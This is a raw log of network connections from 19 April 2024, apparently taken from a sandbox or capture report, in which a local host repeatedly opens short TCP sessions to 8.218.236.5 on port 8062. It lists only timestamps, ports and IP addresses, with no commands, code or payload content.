Apr 19, 2024 09:50:19.045320988 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.045613050 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.366576910 CEST	8062	49759	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.369143963 CEST	8062	49759	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.369185925 CEST	8062	49759	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.369223118 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.369307995 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.369411945 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.484150887 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.690443993 CEST	8062	49759	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.827234030 CEST	8062	49760	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.829169989 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:19.829420090 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.172240019 CEST	8062	49760	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.175683975 CEST	8062	49760	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.175729036 CEST	8062	49760	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.175786972 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.175832987 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.175945997 CEST	49760	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.282938004 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.519042015 CEST	8062	49760	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.599836111 CEST	8062	49761	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.599984884 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.600225925 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.917165041 CEST	8062	49761	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.919202089 CEST	8062	49761	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.919241905 CEST	8062	49761	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:20.919298887 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.919349909 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:20.936636925 CEST	49761	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.046432018 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.253771067 CEST	8062	49761	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:21.372077942 CEST	8062	49762	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:21.372211933 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.372399092 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.697906017 CEST	8062	49762	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:21.700045109 CEST	8062	49762	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:21.700126886 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.700182915 CEST	8062	49762	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:21.700234890 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.700345993 CEST	49762	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:21.814495087 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.025655985 CEST	8062	49762	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.143109083 CEST	8062	49763	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.143271923 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.143507004 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.472496033 CEST	8062	49763	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.474226952 CEST	8062	49763	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.474273920 CEST	8062	49763	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.474430084 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.474430084 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.474503994 CEST	49763	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.580115080 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.802772045 CEST	8062	49763	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.891534090 CEST	8062	49764	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:22.891693115 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:22.891875982 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.202908993 CEST	8062	49764	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.204979897 CEST	8062	49764	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.205044031 CEST	8062	49764	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.205207109 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.205208063 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.205358028 CEST	49764	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.312340975 CEST	49765	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.516326904 CEST	8062	49764	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.630683899 CEST	8062	49765	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.630861998 CEST	49765	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.631139040 CEST	49765	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.949265957 CEST	8062	49765	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.951075077 CEST	8062	49765	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.951090097 CEST	8062	49765	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:23.951849937 CEST	49765	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:23.956196070 CEST	49765	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.065053940 CEST	49766	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.274122953 CEST	8062	49765	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:24.391149998 CEST	8062	49766	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:24.391287088 CEST	49766	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.391550064 CEST	49766	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.717803955 CEST	8062	49766	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:24.719496965 CEST	8062	49766	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:24.719538927 CEST	8062	49766	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:24.719713926 CEST	49766	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.719908953 CEST	49766	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:24.829786062 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.049578905 CEST	8062	49766	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.152679920 CEST	8062	49767	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.153343916 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.153343916 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.476478100 CEST	8062	49767	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.478306055 CEST	8062	49767	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.478348970 CEST	8062	49767	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.478409052 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.478466034 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.478636026 CEST	49767	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.596154928 CEST	49768	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.801611900 CEST	8062	49767	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.912971020 CEST	8062	49768	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:25.913120031 CEST	49768	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:25.913369894 CEST	49768	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.230123997 CEST	8062	49768	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.232325077 CEST	8062	49768	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.232338905 CEST	8062	49768	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.232462883 CEST	49768	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.232645035 CEST	49768	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.343590021 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.549292088 CEST	8062	49768	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.659027100 CEST	8062	49769	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.659313917 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.659636974 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.974837065 CEST	8062	49769	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.976629019 CEST	8062	49769	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.976667881 CEST	8062	49769	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:26.976722956 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.976768017 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:26.976927996 CEST	49769	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.096986055 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.292237043 CEST	8062	49769	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:27.426090002 CEST	8062	49770	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:27.426275015 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.426533937 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.755431890 CEST	8062	49770	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:27.758215904 CEST	8062	49770	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:27.758265018 CEST	8062	49770	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:27.758318901 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.758318901 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.758434057 CEST	49770	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:27.877449989 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.087181091 CEST	8062	49770	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.188878059 CEST	8062	49771	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.189167023 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.189562082 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.500827074 CEST	8062	49771	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.502413988 CEST	8062	49771	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.502458096 CEST	8062	49771	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.502511978 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.502604008 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.502903938 CEST	49771	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.612257004 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.813817024 CEST	8062	49771	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.931469917 CEST	8062	49772	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:28.931595087 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:28.931891918 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.250684977 CEST	8062	49772	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:29.252352953 CEST	8062	49772	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:29.252407074 CEST	8062	49772	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:29.252445936 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.252479076 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.252597094 CEST	49772	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.359224081 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.571379900 CEST	8062	49772	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:29.695199013 CEST	8062	49773	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:29.695395947 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:29.695625067 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.031505108 CEST	8062	49773	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:30.033284903 CEST	8062	49773	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:30.033339977 CEST	8062	49773	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:30.033390045 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.033478022 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.059572935 CEST	49773	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.179071903 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.395777941 CEST	8062	49773	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:30.503757954 CEST	8062	49774	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:30.503941059 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:30.689965963 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:31.014580965 CEST	8062	49774	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:31.016370058 CEST	8062	49774	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:31.016411066 CEST	8062	49774	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:31.016490936 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:31.016490936 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:31.765034914 CEST	49774	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:31.902445078 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.089709044 CEST	8062	49774	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.219269991 CEST	8062	49775	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.219422102 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.219675064 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.536515951 CEST	8062	49775	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.539314985 CEST	8062	49775	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.539355040 CEST	8062	49775	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.539625883 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.539625883 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.539671898 CEST	49775	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.658294916 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.856607914 CEST	8062	49775	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.995119095 CEST	8062	49776	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:32.995450974 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:32.995781898 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.332602978 CEST	8062	49776	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:33.334526062 CEST	8062	49776	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:33.334564924 CEST	8062	49776	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:33.334621906 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.334621906 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.334788084 CEST	49776	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.437402010 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.671597004 CEST	8062	49776	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:33.764255047 CEST	8062	49777	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:33.764539003 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:33.764972925 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.091726065 CEST	8062	49777	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.093440056 CEST	8062	49777	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.093482971 CEST	8062	49777	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.093628883 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.093628883 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.093734026 CEST	49777	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.204900980 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.420521021 CEST	8062	49777	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.533097982 CEST	8062	49778	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.533194065 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.533433914 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.861443043 CEST	8062	49778	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.863297939 CEST	8062	49778	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.863337994 CEST	8062	49778	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:34.863379002 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.863429070 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.863533974 CEST	49778	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:34.970622063 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.193773031 CEST	8062	49778	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:35.293284893 CEST	8062	49779	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:35.293466091 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.293695927 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.613527060 CEST	8062	49779	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:35.615204096 CEST	8062	49779	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:35.615247965 CEST	8062	49779	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:35.615309954 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.615354061 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.615503073 CEST	49779	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.720578909 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:35.935168982 CEST	8062	49779	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.040060043 CEST	8062	49780	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.040275097 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.040851116 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.360207081 CEST	8062	49780	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.361922979 CEST	8062	49780	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.361948013 CEST	8062	49780	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.361990929 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.362067938 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.362196922 CEST	49780	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.468851089 CEST	49781	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.681516886 CEST	8062	49780	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.792836905 CEST	8062	49781	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:36.793030977 CEST	49781	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:36.793201923 CEST	49781	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.116878986 CEST	8062	49781	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.118732929 CEST	8062	49781	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.118757010 CEST	8062	49781	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.118968964 CEST	49781	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.119384050 CEST	49781	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.235972881 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.443063021 CEST	8062	49781	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.548027039 CEST	8062	49782	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.548209906 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.548469067 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.860538006 CEST	8062	49782	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.862226963 CEST	8062	49782	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.862282038 CEST	8062	49782	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:37.862337112 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.862391949 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.862498999 CEST	49782	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:37.986588001 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.174595118 CEST	8062	49782	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:38.315783024 CEST	8062	49783	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:38.315881014 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.316128969 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.649506092 CEST	8062	49783	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:38.652184010 CEST	8062	49783	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:38.652228117 CEST	8062	49783	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:38.652247906 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.652290106 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.652426958 CEST	49783	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.767797947 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:38.981343031 CEST	8062	49783	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.085407019 CEST	8062	49784	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.085583925 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.085890055 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.404489040 CEST	8062	49784	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.405379057 CEST	8062	49784	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.405489922 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.405560970 CEST	8062	49784	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.405625105 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.517769098 CEST	49784	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.518183947 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.835675001 CEST	8062	49784	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.855725050 CEST	8062	49785	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:39.855839014 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:39.856033087 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.193048000 CEST	8062	49785	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.194874048 CEST	8062	49785	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.194894075 CEST	8062	49785	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.194962978 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.195112944 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.195112944 CEST	49785	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.298396111 CEST	49786	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.532016039 CEST	8062	49785	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.625664949 CEST	8062	49786	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.625782013 CEST	49786	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.625983000 CEST	49786	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.953243017 CEST	8062	49786	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.954951048 CEST	8062	49786	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.954998016 CEST	8062	49786	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:40.956950903 CEST	49786	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:40.958913088 CEST	49786	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.064116955 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.285969973 CEST	8062	49786	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:41.385133982 CEST	8062	49787	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:41.385242939 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.385422945 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.706214905 CEST	8062	49787	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:41.708071947 CEST	8062	49787	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:41.708093882 CEST	8062	49787	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:41.708162069 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.708293915 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.708295107 CEST	49787	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:41.814723015 CEST	49788	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.029131889 CEST	8062	49787	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.137865067 CEST	8062	49788	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.137959957 CEST	49788	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.138207912 CEST	49788	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.461152077 CEST	8062	49788	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.462930918 CEST	8062	49788	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.462951899 CEST	8062	49788	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.463031054 CEST	49788	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.463212013 CEST	49788	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.580023050 CEST	49789	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.786104918 CEST	8062	49788	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.916387081 CEST	8062	49789	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:42.916498899 CEST	49789	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:42.916697025 CEST	49789	8062	192.168.2.4	8.218.236.5
